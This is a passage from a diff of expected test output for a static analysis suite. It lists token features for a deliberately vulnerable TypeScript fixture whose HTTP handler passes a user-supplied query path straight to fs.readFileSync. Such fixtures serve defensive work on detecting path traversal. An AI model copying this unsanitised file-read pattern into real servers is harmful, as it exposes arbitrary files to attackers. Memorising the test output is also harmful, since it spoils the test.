path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:26:7:26:11 | path5 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:26:7:26:11 | path5 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:26:7:26:18 | path5 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:26:7:26:18 | path5 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:26:7:26:18 | path5 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:26:7:26:18 | path5 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:26:7:26:18 | path5 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:26:7:26:18 | path5 = path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:26:7:26:18 | path5 = path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:26:7:26:18 | path5 = path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:26:7:26:18 | path5 = path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:26:7:26:18 | path5 = path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:26:15:26:18 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:26:15:26:18 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:26:15:26:18 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:26:15:26:18 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:26:15:26:18 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:27:3:27:7 | path5 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:27:3:27:7 | path5 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:27:3:27:7 | path5 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:27:3:27:7 | path5 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:27:3:27:7 | path5 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:27:3:27:7 | path5 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:27:3:27:7 | path5 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:27:3:27:7 | path5 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:27:3:27:7 | path5 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:27:3:27:7 | path5 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:27:3:27:19 | path5 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:27:3:27:19 | path5 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:27:3:27:19 | path5 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:27:3:27:19 | path5 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:27:3:27:19 | path5 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:27:3:27:19 | path5 &&= "clean" | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:27:3:27:19 | path5 &&= "clean" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:27:3:27:19 | path5 &&= "clean" | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:27:3:27:19 | path5 &&= "clean" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:27:3:27:19 | path5 &&= "clean" | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:27:13:27:19 | "clean" | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:27:13:27:19 | "clean" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:27:13:27:19 | "clean" | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:27:13:27:19 | "clean" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:27:13:27:19 | "clean" | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:28:3:28:3 | path5 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:28:3:28:3 | path5 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:28:3:28:3 | path5 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:28:3:28:3 | path5 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:28:3:28:3 | path5 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:28:3:28:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:28:3:28:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:28:3:28:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:28:3:28:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:28:3:28:5 | res | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:28:3:28:11 | res.write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:28:3:28:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:28:3:28:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:28:3:28:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:28:3:28:11 | res.write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:28:3:28:35 | exceptional return of res.wri ... path5)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:28:3:28:35 | exceptional return of res.wri ... path5)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:28:3:28:35 | exceptional return of res.wri ... path5)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:28:3:28:35 | exceptional return of res.wri ... path5)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:28:3:28:35 | exceptional return of res.wri ... path5)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:28:3:28:35 | res.wri ... path5)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:28:3:28:35 | res.wri ... path5)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:28:3:28:35 | res.wri ... path5)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:28:3:28:35 | res.wri ... path5)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:28:3:28:35 | res.wri ... path5)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:28:7:28:11 | write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:28:7:28:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:28:7:28:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:28:7:28:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:28:7:28:11 | write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:28:13:28:14 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:28:13:28:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:28:13:28:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:28:13:28:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:28:13:28:14 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:28:13:28:27 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:28:13:28:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:28:13:28:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:28:13:28:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:28:13:28:27 | fs.readFileSync | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:28:13:28:34 | exceptional return of fs.read ... (path5) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:28:13:28:34 | exceptional return of fs.read ... (path5) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:28:13:28:34 | exceptional return of fs.read ... (path5) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:28:13:28:34 | exceptional return of fs.read ... (path5) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:28:13:28:34 | exceptional return of fs.read ... (path5) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:28:13:28:34 | fs.read ... (path5) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/typescript.ts:28:13:28:34 | fs.read ... (path5) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:28:13:28:34 | fs.read ... (path5) | contextFunctionInterfaces | | @@ -11756,6 +89314,11 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:28:13:28:34 | fs.read ... (path5) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:28:13:28:34 | fs.read ... (path5) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:28:13:28:34 | fs.read ... (path5) | receiverName | res | +| autogenerated/TaintedPath/typescript.ts:28:16:28:27 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:28:16:28:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:28:16:28:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:28:16:28:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:28:16:28:27 | readFileSync | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:28:29:28:33 | path5 | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/typescript.ts:28:29:28:33 | path5 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:28:29:28:33 | path5 | calleeImports | fs | @@ -11765,6 +89328,96 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:28:29:28:33 | path5 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:28:29:28:33 | path5 | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:28:29:28:33 | path5 | receiverName | fs | +| autogenerated/TaintedPath/typescript.ts:30:7:30:11 | path6 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:30:7:30:11 | path6 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:30:7:30:11 | path6 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:30:7:30:11 | path6 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:30:7:30:11 | path6 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:30:7:30:18 | path6 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:30:7:30:18 | path6 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:30:7:30:18 | path6 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:30:7:30:18 | path6 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:30:7:30:18 | path6 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:30:7:30:18 | path6 = path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:30:7:30:18 | path6 = path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:30:7:30:18 | path6 = path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:30:7:30:18 | path6 = path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:30:7:30:18 | path6 = path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:30:15:30:18 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:30:15:30:18 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:30:15:30:18 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:30:15:30:18 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:30:15:30:18 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:31:3:31:7 | path6 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:31:3:31:7 | path6 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:31:3:31:7 | path6 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:31:3:31:7 | path6 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:31:3:31:7 | path6 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:31:3:31:7 | path6 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:31:3:31:7 | path6 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:31:3:31:7 | path6 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:31:3:31:7 | path6 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:31:3:31:7 | path6 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:31:3:31:19 | path6 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:31:3:31:19 | path6 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:31:3:31:19 | path6 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:31:3:31:19 | path6 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:31:3:31:19 | path6 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:31:3:31:19 | path6 \|\|= "clean" | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:31:3:31:19 | path6 \|\|= "clean" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:31:3:31:19 | path6 \|\|= "clean" | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:31:3:31:19 | path6 \|\|= "clean" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:31:3:31:19 | path6 \|\|= "clean" | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:31:13:31:19 | "clean" | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:31:13:31:19 | "clean" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:31:13:31:19 | "clean" | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:31:13:31:19 | "clean" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:31:13:31:19 | "clean" | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:32:3:32:3 | path6 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:32:3:32:3 | path6 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:32:3:32:3 | path6 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:32:3:32:3 | path6 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:32:3:32:3 | path6 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:32:3:32:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:32:3:32:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:32:3:32:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:32:3:32:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:32:3:32:5 | res | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:32:3:32:11 | res.write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:32:3:32:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:32:3:32:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:32:3:32:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:32:3:32:11 | res.write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:32:3:32:35 | exceptional return of res.wri ... path6)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:32:3:32:35 | exceptional return of res.wri ... path6)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:32:3:32:35 | exceptional return of res.wri ... path6)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:32:3:32:35 | exceptional return of res.wri ... path6)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:32:3:32:35 | exceptional return of res.wri ... path6)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:32:3:32:35 | res.wri ... path6)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:32:3:32:35 | res.wri ... path6)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:32:3:32:35 | res.wri ... path6)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:32:3:32:35 | res.wri ... path6)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:32:3:32:35 | res.wri ... path6)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:32:7:32:11 | write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:32:7:32:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:32:7:32:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:32:7:32:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:32:7:32:11 | write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:32:13:32:14 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:32:13:32:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:32:13:32:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:32:13:32:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:32:13:32:14 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:32:13:32:27 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:32:13:32:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:32:13:32:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:32:13:32:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| 